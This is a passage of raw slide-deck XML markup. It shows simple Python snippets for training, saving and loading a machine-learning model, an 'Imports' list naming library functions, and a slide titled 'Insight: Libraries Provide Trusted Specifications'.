                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Google Shape;600;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="602" name="Google Shape;602;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.SGD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Google Shape;604;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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0" name="Shape 610"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Google Shape;611;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.SGD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Google Shape;613;p54"/>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614" name="Google Shape;614;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Google Shape;615;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
